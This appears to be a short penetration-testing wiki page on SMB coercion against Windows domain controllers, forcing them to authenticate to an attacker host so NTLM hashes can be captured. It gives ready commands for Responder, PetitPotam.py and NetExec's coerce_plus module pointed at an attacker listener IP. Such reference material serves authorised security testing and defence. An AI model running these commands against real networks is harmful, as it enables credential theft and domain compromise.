SMB Coercing (445)

Basics

SMB Coercing is a method to force the domain controller to authenticate against our host. Within this attack we can capture the NetNLM hash. Currently there are multiple possible ways to coerce smb. A well-known method is to use the Encrypting File System Remote Protocol (MS-EFSR) and the PetitPotam script. Other ways using impackets ntlmrelay.py script. These will be added to this wiki in later versions.

Coercing can be thought of as a higher escalation level or advanced method of NTLM relaying. See:

NTLMRelaying (445)

Attacks

PetitPotam

Preparation:

Check if Responder is running

sudo responder -I <INTERFACE>

Coercing execution:

PetitPotam.py

python3 ./PetitPotam.py <DOMIAN> <LISTENER_IP> <TARGET_IP>

NetExec

nxc smb <ip> -u '' -p '' -M coerce_plus
nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP>

PreviousNTLMRelaying (445)NextPre2k

Last updated 7 months ago

Was this helpful?